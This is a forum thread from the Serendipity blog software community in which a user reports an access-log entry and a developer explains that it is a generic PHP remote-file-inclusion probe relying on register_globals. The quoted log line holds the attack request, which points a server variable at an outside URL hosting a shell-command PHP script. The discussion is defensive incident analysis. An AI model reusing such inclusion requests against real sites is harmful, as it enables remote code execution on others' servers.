general exploit or specifically for S9y?

[rowi]

just fell over an interesting access in the error_log:

Code: Select all

193.63.251.123 - - [08/Sep/2009:15:04:02 +0200] "GET /serendipity_admin_image_sel...em&serendipity%5bimage%5d=639/?_SERVER%5bDOCUMENT_ROOT%5d=http://shop.kbench.com/xml/ec.txt%3f HTTP/1.1" 404 348 "-" "libwww-perl/5.79"

the ec.txt is a PHP script which tries to execute shell commands.

Seems like an exploit try you often see but the selectiv access on serendipity_admin_image_sel...em makes me wonder if it's a dedicated try to exploit S9y as it is nowhere linked. On the other hand, the image_selector which is obviously meant is written incorrectly which would speak against a specific exploit.

Anyone?

[garvinhicking]

Hi!

Thanks for notifying...at least I couldn't see any attack vectors on these variables. To me it seems a more general exploit that simply tries to append a global _SERVER variable and rely on the php register_globals variable, that might work independently of which PHP application is used.

The forum her cut the URL, but are you able to execute the full URL and see what output you get? The exploit would at least give you a "Mic22" output somewhere inside the HTML, if anything was affected at all.

Regards,
Garvin

[rowi]

The URL is correct the way it's shown (at least to me), the requested file is "serendipity_admin_image_sel...em" with the dots. If this is shortened it's made by the webserver prior logging which I don't believe.
That's what made me curious - on one Hand it tries to access specifically a file which seems to be serendipity_admin_image_selector.php, on the other hand the name is not correctly spelled.
If I try to access the URL I get a 404 error like the original request.